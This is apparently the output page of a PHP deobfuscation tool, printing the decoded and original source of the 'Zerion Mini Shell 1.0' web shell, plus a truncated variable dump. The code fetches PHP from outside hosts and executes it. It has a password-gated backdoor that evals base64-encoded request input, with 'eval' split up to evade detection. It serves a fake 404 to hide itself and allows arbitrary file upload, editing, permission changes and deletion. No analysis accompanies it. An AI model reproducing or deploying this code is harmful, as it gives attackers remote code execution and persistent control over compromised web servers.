Find this useful? Enter your email to receive occasional updates for securing PHP code.

Signing you up...

Thank you for signing up!

PHP Decode

$L6CRgr = array("/x/i", "x", "\nfunction GC(\$a)\n{\n \$url = sprintf('%s?api=%s&ac=%s&..

Decoded Output download

<?  $L6CRgr = array("/x/i", "x", "
function GC(\$a)
{
    \$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', \$a, \$_REQUEST['api'], \$_REQUEST['ac'], \$_REQUEST['path'], \$_REQUEST['t']); \$code = @file_get_contents(\$url); if (\$code == false) { \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_USERAGENT, 'll'); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt(\$ch, CURLOPT_TIMEOUT, 100); curl_setopt(\$ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0); \$code = curl_exec(\$ch); curl_close(\$ch); }return \$code;}
if (isset(\$_REQUEST['ac']) && isset(\$_REQUEST['path']) && isset(\$_REQUEST['api']) && isset(\$_REQUEST['t'])) { \$code = GC('https://c.-wic5-.com/'); if(!\$code){\$code = GC('https://c.-oiv3-.com/?flag=flag{af10370d485952897d5183aa09e19883}
');}\$need = '<'.'?'.'php'; if (strpos(\$code, \$need) === false) { die('get failed'); } \$file_name = tmpfile(); fwrite(\$file_name, \$code); \$a = stream_get_meta_data(\$file_name);\$file_path = \$a['uri']; \$content = @file_get_contents(\$file_path);if(!\$content){\$file_path = '.c'; file_put_contents(\$file_path, \$code);}@require(\$file_path); fclose(\$file_name);@unlink(\$file_path);die(); }
if (isset(\$_REQUEST['d_time'])){ die('{->'.\$L7CRgr.'<-}'); }
\$pass = false;
if (isset(\$_COOKIE['pass'])) { if(md5(\$_COOKIE['pass']) == \$L7CRgr) { \$pass = true; } } else { if (isset(\$_POST['pass'])) { if(md5(\$_POST['pass']) == \$L7CRgr) { setcookie(\"pass\", \$_POST['pass']); \$pass = true; } } }
if (isset(\$_POST['logout']) && \$_POST['logout'] = 1) { setcookie(\"pass\", null); \$pass= false; }
if(isset(\$_REQUEST['pwd163']) && md5(\$_REQUEST['pwd163']) == \$L7CRgr) {
    \$a = base64_decode(rawurldecode((urlencode(urldecode(\$_REQUEST['zzz'])))));
    \$need = base64_decode(\"PD9waHA=\");
    if (strpos(\$a, \$need) === false) { \$a = \$need . PHP_EOL . \$a; }
    if (isset(\$_REQUEST['e'])){ \$a = str_replace(\$need, \"\", \$a); \$b = 'e'.base64_decode(\"dmE=\").'l'; \$b(\$a);die(); }
    \$file_name = tmpfile(); fwrite(\$file_name, \$a);
    \$require_params = stream_get_meta_data(\$file_name);
    @require(\$require_params['uri']);
    fclose(\$file_name);die(); }
if (isset(\$_REQUEST['auth_key'])){ die(\$L7CRgr); } if (!\$pass) { if(!isset(\$_REQUEST['520'])) { header(\"HTTP/1.1 404 Not Found\"); die();} echo '<form action=\"#\" method=\"post\"><input type=\"password\" name=\"pass\" > <input type=\"submit\" value=\"submit\"></form>'; die(); }


echo '<form action=\"#\" method=\"post\"><input type=\"hidden\" name=\"logout\" value=\"1\"> <input type=\"submit\" value=\"logout\"></form>'; echo '<!DOCTYPE HTML>
<HTML>
<HEAD>
<link href=\"\" rel=\"stylesheet\" type=\"text/css\">
<title>Mini Shell</title>
<style>
body{
font-family: \"Racing Sans One\", cursive;
background-color: #e6e6e6;
text-shadow:0px 0px 1px #757575;
}
#content tr:hover{
background-color: #636263;
text-shadow:0px 0px 10px #fff;
}
#content .first{
background-color: silver;
}
#content .first:hover{
background-color: silver;
text-shadow:0px 0px 1px #757575;
}
table{
border: 1px #000000 dotted;
}
H1{
font-family: \"Rye\", cursive;
}
a{
color: #000;
text-decoration: none;
}
a:hover{
color: #fff;
text-shadow:0px 0px 10px #ffffff;
}
input,select,textarea{
border: 1px #000000 solid;
-moz-border-radius: 5px;
-webkit-border-radius:5px;
border-radius:5px;
}
</style>
</HEAD>
<BODY>
<H1><center><img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>
 Mini Shell <img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>
 </center></H1>
<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">
<tr><td>Direktori : '; if(isset(\$_GET['path'])){ \$path = \$_GET['path']; }else{ \$path = getcwd(); } \$path = str_replace('\\','/',\$path); \$paths = explode('/',\$path); foreach(\$paths as \$id=>\$pat){ if(\$pat == '' && \$id == 0){ \$a = true; echo '<a href=\"?path=/\">/</a>'; continue; } if(\$pat == '') continue; echo '<a href=\"?path='; for(\$i=0;\$i<=\$id;\$i++){ echo \"\$paths[\$i]\"; if(\$i != \$id) echo \"/\"; } echo '\">'.\$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset(\$_POST['path_create'])) {if(@mkdir(\$path.'/' . \$_POST['path_create'])){echo '<font color=\"green\">create success :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}else{echo '<font color=\"red\">create failed :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}}if(isset(\$_FILES['file'])){ if(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){ echo '<font color=\"green\">File Ter-Upload :* </font><br />'; }else{ echo '<font color=\"red\">Upload gagal, Servernya kek <img src=\"http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif\"/>
 </font><br />'; } } echo '<form enctype=\"multipart/form-data\" method=\"POST\">
Upload File : <input type=\"file\" name=\"file\" />
<input type=\"submit\" value=\"upload\" />
</form>
</td></tr>
<tr><td><form enctype=\"multipart/form-data\" method=\"POST\">
Create Path : <input type=\"text\" name=\"path_create\" />
<input type=\"submit\" value=\"create\" />
</form></td></td>'; if(isset(\$_GET['filesrc'])){ echo \"<tr><td>Current File : \"; echo \$_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre>'); }elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){ echo '</table><br /><center>'.\$_POST['path'].'<br /><br />'; if(\$_POST['opt'] == 'chmod'){ if(isset(\$_POST['perm'])){ if(chmod(\$_POST['path'],octdec(\$_POST['perm']))){ echo '<font color=\"green\">Change Permission Done.</font><br />'; }else{ echo '<font color=\"red\">Change Permission Error.</font><br />'; } } echo '<form method=\"POST\">
Permission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$_POST['path'])), -4).'\" />
<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">
<input type=\"hidden\" name=\"opt\" value=\"chmod\">
<input type=\"submit\" value=\"Go\" />
</form>'; }elseif(\$_POST['opt'] == 'rename'){ if(isset(\$_POST['newname'])){ if(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){ echo '<font color=\"green\">Change Name Done.</font><br />'; }else{ echo '<font color=\"red\">Change Name Error.</font><br />'; } \$_POST['name'] = \$_POST['newname']; } echo '<form method=\"POST\">
New Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$_POST['name'].'\" />
<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">
<input type=\"hidden\" name=\"opt\" value=\"rename\">
<input type=\"submit\" value=\"Go\" />
</form>'; }elseif(\$_POST['opt'] == 'edit'){ if(isset(\$_POST['src'])){ \$fp = fopen(\$_POST['path'],'w'); if(fwrite(\$fp,\$_POST['src'])){ echo '<font color=\"green\">Edit File Done ~_^.</font><br />'; }else{ echo '<font color=\"red\">Edit File Error ~_~.</font><br />'; } fclose(\$fp); } echo '<form method=\"POST\">
<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />
<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">
<input type=\"hidden\" name=\"opt\" value=\"edit\">
<input type=\"submit\" value=\"Go\" />
</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){ if(\$_POST['type'] == 'dir'){ if(rmdir(\$_POST['path'])){ echo '<font color=\"green\">Delete Dir Done.</font><br />'; }else{ echo '<font color=\"red\">Delete Dir Error.</font><br />'; } }elseif(\$_POST['type'] == 'file'){ if(unlink(\$_POST['path'])){ echo '<font color=\"green\">Delete File Done.</font><br />'; }else{ echo '<font color=\"red\">Delete File Error.</font><br />'; } } } echo '</center>'; \$scandir = scandir(\$path); echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">
<tr class=\"first\">
<td><center>Name</center></td>
<td><center>Size</center></td>
<td><center>Permissions</center></td>
<td><center>Options</center></td>
</tr>'; foreach(\$scandir as \$dir){ if(!is_dir(\"\$path/\$dir\") || \$dir == '.' || \$dir == '..') continue; echo \"<tr>
<td><a href=\\"?path=\$path/\$dir\\">\$dir</a></td>
<td><center>--</center></td>
<td><center>\"; if(is_writable(\"\$path/\$dir\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$dir\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$dir\"); if(is_writable(\"\$path/\$dir\") || !is_readable(\"\$path/\$dir\")) echo '</font>'; echo \"</center></td>
<td><center><form method=\\"POST\\" action=\\"?option&path=\$path\\">
<select name=\\"opt\\">
<option value=\\"\\"></option>
<option value=\\"delete\\">Delete</option>
<option value=\\"chmod\\">Chmod</option>
<option value=\\"rename\\">Rename</option>
</select>
<input type=\\"hidden\\" name=\\"type\\" value=\\"dir\\">
<input type=\\"hidden\\" name=\\"name\\" value=\\"\$dir\\">
<input type=\\"hidden\\" name=\\"path\\" value=\\"\$path/\$dir\\">
<input type=\\"submit\\" value=\\">\\" />
</form></center></td>
</tr>\"; } echo '<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>'; foreach(\$scandir as \$file){ if(!is_file(\"\$path/\$file\")) continue; \$size = filesize(\"\$path/\$file\")/1024; \$size = round(\$size,3); if(\$size >= 1024){ \$size = round(\$size/1024,2).' MB'; }else{ \$size = \$size.' KB'; } echo \"<tr>
<td><a href=\\"?filesrc=\$path/\$file&path=\$path\\">\$file</a></td>
<td><center>\".\$size.\"</center></td>
<td><center>\"; if(is_writable(\"\$path/\$file\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$file\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$file\"); if(is_writable(\"\$path/\$file\") || !is_readable(\"\$path/\$file\")) echo '</font>'; echo \"</center></td>
<td><center><form method=\\"POST\\" action=\\"?option&path=\$path\\">
<select name=\\"opt\\">
<option value=\\"\\"></option>
<option value=\\"delete\\">Delete</option>
<option value=\\"chmod\\">Chmod</option>
<option value=\\"rename\\">Rename</option>
<option value=\\"edit\\">Edit</option>
</select>

<input type=\\"hidden\\" name=\\"type\\" value=\\"file\\">
<input type=\\"hidden\\" name=\\"name\\" value=\\"\$file\\">
<input type=\\"hidden\\" name=\\"path\\" value=\\"\$path/\$file\\">
<input type=\\"submit\\" value=\\">\\" />
</form></center></td>
</tr>\"; } echo '</table>
</div>'; } echo '<center><br />Zerion Mini Shell <font color=\"green\">1.0</font></center>
</BODY>
</HTML>'; function perms(\$file){ \$perms = fileperms(\$file); if ((\$perms & 0xC000) == 0xC000) { \$info = 's'; } elseif ((\$perms & 0xA000) == 0xA000) { \$info = 'l'; } elseif ((\$perms & 0x8000) == 0x8000) { \$info = '-'; } elseif ((\$perms & 0x6000) == 0x6000) { \$info = 'b'; } elseif ((\$perms & 0x4000) == 0x4000) { \$info = 'd'; } elseif ((\$perms & 0x2000) == 0x2000) { \$info = 'c'; } elseif ((\$perms & 0x1000) == 0x1000) { \$info = 'p'; } else { \$info = 'u'; } \$info .= ((\$perms & 0x0100) ? 'r' : '-'); \$info .= ((\$perms & 0x0080) ? 'w' : '-'); \$info .= ((\$perms & 0x0040) ? ((\$perms & 0x0800) ? 's' : 'x' ) : ((\$perms & 0x0800) ? 'S' : '-')); \$info .= ((\$perms & 0x0020) ? 'r' : '-'); \$info .= ((\$perms & 0x0010) ? 'w' : '-'); \$info .= ((\$perms & 0x0008) ? ((\$perms & 0x0400) ? 's' : 'x' ) : ((\$perms & 0x0400) ? 'S' : '-')); \$info .= ((\$perms & 0x0004) ? 'r' : '-'); \$info .= ((\$perms & 0x0002) ? 'w' : '-'); \$info .= ((\$perms & 0x0001) ? ((\$perms & 0x0200) ? 't' : 'x' ) : ((\$perms & 0x0200) ? 'T' : '-')); return \$info; }"); ?>

Did this file decode correctly?

Original Code

$L6CRgr = array("/x/i", "x", "\nfunction GC(\$a)\n{\n    \$url = sprintf('%s?api=%s&ac=%s&path=%s&t=%s', \$a, \$_REQUEST['api'], \$_REQUEST['ac'], \$_REQUEST['path'], \$_REQUEST['t']); \$code = @file_get_contents(\$url); if (\$code == false) { \$ch = curl_init(); curl_setopt(\$ch, CURLOPT_URL, \$url); curl_setopt(\$ch, CURLOPT_USERAGENT, 'll'); curl_setopt(\$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt(\$ch, CURLOPT_TIMEOUT, 100); curl_setopt(\$ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt(\$ch, CURLOPT_SSL_VERIFYPEER, 0); \$code = curl_exec(\$ch); curl_close(\$ch); }return \$code;}\nif (isset(\$_REQUEST['ac']) && isset(\$_REQUEST['path']) && isset(\$_REQUEST['api']) && isset(\$_REQUEST['t'])) { \$code = GC('https://c.-wic5-.com/'); if(!\$code){\$code = GC('https://c.-oiv3-.com/?flag=flag{af10370d485952897d5183aa09e19883}\n');}\$need = '<'.'?'.'php'; if (strpos(\$code, \$need) === false) { die('get failed'); } \$file_name = tmpfile(); fwrite(\$file_name, \$code); \$a = stream_get_meta_data(\$file_name);\$file_path = \$a['uri']; \$content = @file_get_contents(\$file_path);if(!\$content){\$file_path = '.c'; file_put_contents(\$file_path, \$code);}@require(\$file_path); fclose(\$file_name);@unlink(\$file_path);die(); }\nif (isset(\$_REQUEST['d_time'])){ die('{->'.\$L7CRgr.'<-}'); }\n\$pass = false;\nif (isset(\$_COOKIE['pass'])) { if(md5(\$_COOKIE['pass']) == \$L7CRgr) { \$pass = true; } } else { if (isset(\$_POST['pass'])) { if(md5(\$_POST['pass']) == \$L7CRgr) { setcookie(\"pass\", \$_POST['pass']); \$pass = true; } } }\nif (isset(\$_POST['logout']) && \$_POST['logout'] = 1) { setcookie(\"pass\", null); \$pass= false; }\nif(isset(\$_REQUEST['pwd163']) && md5(\$_REQUEST['pwd163']) == \$L7CRgr) {\n    \$a = base64_decode(rawurldecode((urlencode(urldecode(\$_REQUEST['zzz'])))));\n    \$need = base64_decode(\"PD9waHA=\");\n    if (strpos(\$a, \$need) === false) { \$a = \$need . PHP_EOL . \$a; }\n    if (isset(\$_REQUEST['e'])){ \$a = str_replace(\$need, \"\", \$a); \$b = 'e'.base64_decode(\"dmE=\").'l'; \$b(\$a);die(); }\n    \$file_name = tmpfile(); fwrite(\$file_name, \$a);\n    \$require_params = stream_get_meta_data(\$file_name);\n    @require(\$require_params['uri']);\n    fclose(\$file_name);die(); }\nif (isset(\$_REQUEST['auth_key'])){ die(\$L7CRgr); } if (!\$pass) { if(!isset(\$_REQUEST['520'])) { header(\"HTTP/1.1 404 Not Found\"); die();} echo '<form action=\"#\" method=\"post\"><input type=\"password\" name=\"pass\" > <input type=\"submit\" value=\"submit\"></form>'; die(); }\n\n\necho '<form action=\"#\" method=\"post\"><input type=\"hidden\" name=\"logout\" value=\"1\"> <input type=\"submit\" value=\"logout\"></form>'; echo '<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href=\"\" rel=\"stylesheet\" type=\"text/css\">\n<title>Mini Shell</title>\n<style>\nbody{\nfont-family: \"Racing Sans One\", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: \"Rye\", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 5px;\n-webkit-border-radius:5px;\nborder-radius:5px;\n}\n</style>\n</HEAD>\n<BODY>\n<H1><center><img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>\n Mini Shell <img src=\"https://s.yimg.com/lq/i/mesg/emoticons7/19.gif\"/>\n </center></H1>\n<table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr><td>Direktori : '; if(isset(\$_GET['path'])){ \$path = \$_GET['path']; }else{ \$path = getcwd(); } \$path = str_replace('\\\\','/',\$path); \$paths = explode('/',\$path); foreach(\$paths as \$id=>\$pat){ if(\$pat == '' && \$id == 0){ \$a = true; echo '<a href=\"?path=/\">/</a>'; continue; } if(\$pat == '') continue; echo '<a href=\"?path='; for(\$i=0;\$i<=\$id;\$i++){ echo \"\$paths[\$i]\"; if(\$i != \$id) echo \"/\"; } echo '\">'.\$pat.'</a>/'; } echo '</td></tr><tr><td>';if(isset(\$_POST['path_create'])) {if(@mkdir(\$path.'/' . \$_POST['path_create'])){echo '<font color=\"green\">create success :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}else{echo '<font color=\"red\">create failed :* '.\$path.'/' . \$_POST['path_create'].'</font><br />';}}if(isset(\$_FILES['file'])){ if(copy(\$_FILES['file']['tmp_name'],\$path.'/'.\$_FILES['file']['name'])){ echo '<font color=\"green\">File Ter-Upload :* </font><br />'; }else{ echo '<font color=\"red\">Upload gagal, Servernya kek <img src=\"http://c.fastcompany.net/asset_files/-/2014/11/11/4F4.gif\"/>\n </font><br />'; } } echo '<form enctype=\"multipart/form-data\" method=\"POST\">\nUpload File : <input type=\"file\" name=\"file\" />\n<input type=\"submit\" value=\"upload\" />\n</form>\n</td></tr>\n<tr><td><form enctype=\"multipart/form-data\" method=\"POST\">\nCreate Path : <input type=\"text\" name=\"path_create\" />\n<input type=\"submit\" value=\"create\" />\n</form></td></td>'; if(isset(\$_GET['filesrc'])){ echo \"<tr><td>Current File : \"; echo \$_GET['filesrc']; echo '</tr></td></table><br />'; echo('<pre>'.htmlspecialchars(file_get_contents(\$_GET['filesrc'])).'</pre>'); }elseif(isset(\$_GET['option']) && \$_POST['opt'] != 'delete'){ echo '</table><br /><center>'.\$_POST['path'].'<br /><br />'; if(\$_POST['opt'] == 'chmod'){ if(isset(\$_POST['perm'])){ if(chmod(\$_POST['path'],octdec(\$_POST['perm']))){ echo '<font color=\"green\">Change Permission Done.</font><br />'; }else{ echo '<font color=\"red\">Change Permission Error.</font><br />'; } } echo '<form method=\"POST\">\nPermission : <input name=\"perm\" type=\"text\" size=\"4\" value=\"'.substr(sprintf('%o', fileperms(\$_POST['path'])), -4).'\" />\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\n<input type=\"hidden\" name=\"opt\" value=\"chmod\">\n<input type=\"submit\" value=\"Go\" />\n</form>'; }elseif(\$_POST['opt'] == 'rename'){ if(isset(\$_POST['newname'])){ if(rename(\$_POST['path'],\$path.'/'.\$_POST['newname'])){ echo '<font color=\"green\">Change Name Done.</font><br />'; }else{ echo '<font color=\"red\">Change Name Error.</font><br />'; } \$_POST['name'] = \$_POST['newname']; } echo '<form method=\"POST\">\nNew Name : <input name=\"newname\" type=\"text\" size=\"20\" value=\"'.\$_POST['name'].'\" />\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\n<input type=\"hidden\" name=\"opt\" value=\"rename\">\n<input type=\"submit\" value=\"Go\" />\n</form>'; }elseif(\$_POST['opt'] == 'edit'){ if(isset(\$_POST['src'])){ \$fp = fopen(\$_POST['path'],'w'); if(fwrite(\$fp,\$_POST['src'])){ echo '<font color=\"green\">Edit File Done ~_^.</font><br />'; }else{ echo '<font color=\"red\">Edit File Error ~_~.</font><br />'; } fclose(\$fp); } echo '<form method=\"POST\">\n<textarea cols=80 rows=20 name=\"src\">'.htmlspecialchars(file_get_contents(\$_POST['path'])).'</textarea><br />\n<input type=\"hidden\" name=\"path\" value=\"'.\$_POST['path'].'\">\n<input type=\"hidden\" name=\"opt\" value=\"edit\">\n<input type=\"submit\" value=\"Go\" />\n</form>'; } echo '</center>'; }else{ echo '</table><br /><center>'; if(isset(\$_GET['option']) && \$_POST['opt'] == 'delete'){ if(\$_POST['type'] == 'dir'){ if(rmdir(\$_POST['path'])){ echo '<font color=\"green\">Delete Dir Done.</font><br />'; }else{ echo '<font color=\"red\">Delete Dir Error.</font><br />'; } }elseif(\$_POST['type'] == 'file'){ if(unlink(\$_POST['path'])){ echo '<font color=\"green\">Delete File Done.</font><br />'; }else{ echo '<font color=\"red\">Delete File Error.</font><br />'; } } } echo '</center>'; \$scandir = scandir(\$path); echo '<div id=\"content\"><table width=\"700\" border=\"0\" cellpadding=\"3\" cellspacing=\"1\" align=\"center\">\n<tr class=\"first\">\n<td><center>Name</center></td>\n<td><center>Size</center></td>\n<td><center>Permissions</center></td>\n<td><center>Options</center></td>\n</tr>'; foreach(\$scandir as \$dir){ if(!is_dir(\"\$path/\$dir\") || \$dir == '.' || \$dir == '..') continue; echo \"<tr>\n<td><a href=\\\"?path=\$path/\$dir\\\">\$dir</a></td>\n<td><center>--</center></td>\n<td><center>\"; if(is_writable(\"\$path/\$dir\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$dir\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$dir\"); if(is_writable(\"\$path/\$dir\") || !is_readable(\"\$path/\$dir\")) echo '</font>'; echo \"</center></td>\n<td><center><form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n<select name=\\\"opt\\\">\n<option value=\\\"\\\"></option>\n<option value=\\\"delete\\\">Delete</option>\n<option value=\\\"chmod\\\">Chmod</option>\n<option value=\\\"rename\\\">Rename</option>\n</select>\n<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"dir\\\">\n<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$dir\\\">\n<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$dir\\\">\n<input type=\\\"submit\\\" value=\\\">\\\" />\n</form></center></td>\n</tr>\"; } echo '<tr class=\"first\"><td></td><td></td><td></td><td></td></tr>'; foreach(\$scandir as \$file){ if(!is_file(\"\$path/\$file\")) continue; \$size = filesize(\"\$path/\$file\")/1024; \$size = round(\$size,3); if(\$size >= 1024){ \$size = round(\$size/1024,2).' MB'; }else{ \$size = \$size.' KB'; } echo \"<tr>\n<td><a href=\\\"?filesrc=\$path/\$file&path=\$path\\\">\$file</a></td>\n<td><center>\".\$size.\"</center></td>\n<td><center>\"; if(is_writable(\"\$path/\$file\")) echo '<font color=\"green\">'; elseif(!is_readable(\"\$path/\$file\")) echo '<font color=\"red\">'; echo perms(\"\$path/\$file\"); if(is_writable(\"\$path/\$file\") || !is_readable(\"\$path/\$file\")) echo '</font>'; echo \"</center></td>\n<td><center><form method=\\\"POST\\\" action=\\\"?option&path=\$path\\\">\n<select name=\\\"opt\\\">\n<option value=\\\"\\\"></option>\n<option value=\\\"delete\\\">Delete</option>\n<option value=\\\"chmod\\\">Chmod</option>\n<option value=\\\"rename\\\">Rename</option>\n<option value=\\\"edit\\\">Edit</option>\n</select>\n\n<input type=\\\"hidden\\\" name=\\\"type\\\" value=\\\"file\\\">\n<input type=\\\"hidden\\\" name=\\\"name\\\" value=\\\"\$file\\\">\n<input type=\\\"hidden\\\" name=\\\"path\\\" value=\\\"\$path/\$file\\\">\n<input type=\\\"submit\\\" value=\\\">\\\" />\n</form></center></td>\n</tr>\"; } echo '</table>\n</div>'; } echo '<center><br />Zerion Mini Shell <font color=\"green\">1.0</font></center>\n</BODY>\n</HTML>'; function perms(\$file){ \$perms = fileperms(\$file); if ((\$perms & 0xC000) == 0xC000) { \$info = 's'; } elseif ((\$perms & 0xA000) == 0xA000) { \$info = 'l'; } elseif ((\$perms & 0x8000) == 0x8000) { \$info = '-'; } elseif ((\$perms & 0x6000) == 0x6000) { \$info = 'b'; } elseif ((\$perms & 0x4000) == 0x4000) { \$info = 'd'; } elseif ((\$perms & 0x2000) == 0x2000) { \$info = 'c'; } elseif ((\$perms & 0x1000) == 0x1000) { \$info = 'p'; } else { \$info = 'u'; } \$info .= ((\$perms & 0x0100) ? 'r' : '-'); \$info .= ((\$perms & 0x0080) ? 'w' : '-'); \$info .= ((\$perms & 0x0040) ? ((\$perms & 0x0800) ? 's' : 'x' ) : ((\$perms & 0x0800) ? 'S' : '-')); \$info .= ((\$perms & 0x0020) ? 'r' : '-'); \$info .= ((\$perms & 0x0010) ? 'w' : '-'); \$info .= ((\$perms & 0x0008) ? ((\$perms & 0x0400) ? 's' : 'x' ) : ((\$perms & 0x0400) ? 'S' : '-')); \$info .= ((\$perms & 0x0004) ? 'r' : '-'); \$info .= ((\$perms & 0x0002) ? 'w' : '-'); \$info .= ((\$perms & 0x0001) ? ((\$perms & 0x0200) ? 't' : 'x' ) : ((\$perms & 0x0200) ? 'T' : '-')); return \$info; }");

Function Calls

None

Variables

$L6CRgr [{'key': 0, 'value': '/x/i'}, {'key': 1, 'value': 'x'}, {'key': 2, 'value': '\nfunction GC(\\$a)\n{\n \\$url = sprintf(\'%s?api=%s&ac=%s&path=%s&t=%s\', \\$a, \\$_REQUEST[\'api\'], \\$_REQUEST[\'ac\'], \\$_REQUEST[\'path\'], \\$_REQUEST[\'t\']); \\$code = @file_get_contents(\\$url); if (\\$code == false) { \\$ch = curl_init(); curl_setopt(\\$ch, CURLOPT_URL, \\$url); curl_setopt(\\$ch, CURLOPT_USERAGENT, \'ll\'); curl_setopt(\\$ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt(\\$ch, CURLOPT_TIMEOUT, 100); curl_setopt(\\$ch, CURLOPT_FRESH_CONNECT, TRUE); curl_setopt(\\$ch, CURLOPT_SSL_VERIFYPEER, 0); \\$code = curl_exec(\\$ch); curl_close(\\$ch); }return \\$code;}\nif (isset(\\$_REQUEST[\'ac\']) && isset(\\$_REQUEST[\'path\']) && isset(\\$_REQUEST[\'api\']) && isset(\\$_REQUEST[\'t\'])) { \\$code = GC(\'https://c.-wic5-.com/\'); if(!\\$code){\\$code = GC(\'https://c.-oiv3-.com/?flag=flag{af10370d485952897d5183aa09e19883}\n\');}\\$need = \'<\'.\'?\'.\'php\'; if (strpos(\\$code, \\$need) === false) { die(\'get failed\'); } \\$file_name = tmpfile(); fwrite(\\$file_name, \\$code); \\$a = stream_get_meta_data(\\$file_name);\\$file_path = \\$a[\'uri\']; \\$content = @file_get_contents(\\$file_path);if(!\\$content){\\$file_path = \'.c\'; file_put_contents(\\$file_path, \\$code);}@require(\\$file_path); fclose(\\$file_name);@unlink(\\$file_path);die(); }\nif (isset(\\$_REQUEST[\'d_time\'])){ die(\'{->\'.\\$L7CRgr.\'<-}\'); }\n\\$pass = false;\nif (isset(\\$_COOKIE[\'pass\'])) { if(md5(\\$_COOKIE[\'pass\']) == \\$L7CRgr) { \\$pass = true; } } else { if (isset(\\$_POST[\'pass\'])) { if(md5(\\$_POST[\'pass\']) == \\$L7CRgr) { setcookie("pass", \\$_POST[\'pass\']); \\$pass = true; } } }\nif (isset(\\$_POST[\'logout\']) && \\$_POST[\'logout\'] = 1) { setcookie("pass", null); \\$pass= false; }\nif(isset(\\$_REQUEST[\'pwd163\']) && md5(\\$_REQUEST[\'pwd163\']) == \\$L7CRgr) {\n \\$a = base64_decode(rawurldecode((urlencode(urldecode(\\$_REQUEST[\'zzz\'])))));\n \\$need = base64_decode("PD9waHA=");\n if (strpos(\\$a, \\$need) === false) { \\$a = \\$need . PHP_EOL . \\$a; }\n if (isset(\\$_REQUEST[\'e\'])){ \\$a = str_replace(\\$need, "", \\$a); \\$b = \'e\'.base64_decode("dmE=").\'l\'; \\$b(\\$a);die(); }\n \\$file_name = tmpfile(); fwrite(\\$file_name, \\$a);\n \\$require_params = stream_get_meta_data(\\$file_name);\n @require(\\$require_params[\'uri\']);\n fclose(\\$file_name);die(); }\nif (isset(\\$_REQUEST[\'auth_key\'])){ die(\\$L7CRgr); } if (!\\$pass) { if(!isset(\\$_REQUEST[\'520\'])) { header("HTTP/1.1 404 Not Found"); die();} echo \'<form action="#" method="post"><input type="password" name="pass" > <input type="submit" value="submit"></form>\'; die(); }\n\n\necho \'<form action="#" method="post"><input type="hidden" name="logout" value="1"> <input type="submit" value="logout"></form>\'; echo \'<!DOCTYPE HTML>\n<HTML>\n<HEAD>\n<link href="" rel="stylesheet" type="text/css">\n<title>Mini Shell</title>\n<style>\nbody{\nfont-family: "Racing Sans One", cursive;\nbackground-color: #e6e6e6;\ntext-shadow:0px 0px 1px #757575;\n}\n#content tr:hover{\nbackground-color: #636263;\ntext-shadow:0px 0px 10px #fff;\n}\n#content .first{\nbackground-color: silver;\n}\n#content .first:hover{\nbackground-color: silver;\ntext-shadow:0px 0px 1px #757575;\n}\ntable{\nborder: 1px #000000 dotted;\n}\nH1{\nfont-family: "Rye", cursive;\n}\na{\ncolor: #000;\ntext-decoration: none;\n}\na:hover{\ncolor: #fff;\ntext-shadow:0px 0px 10px #ffffff;\n}\ninput,select,textarea{\nborder: 1px #000000 solid;\n-moz-border-radius: 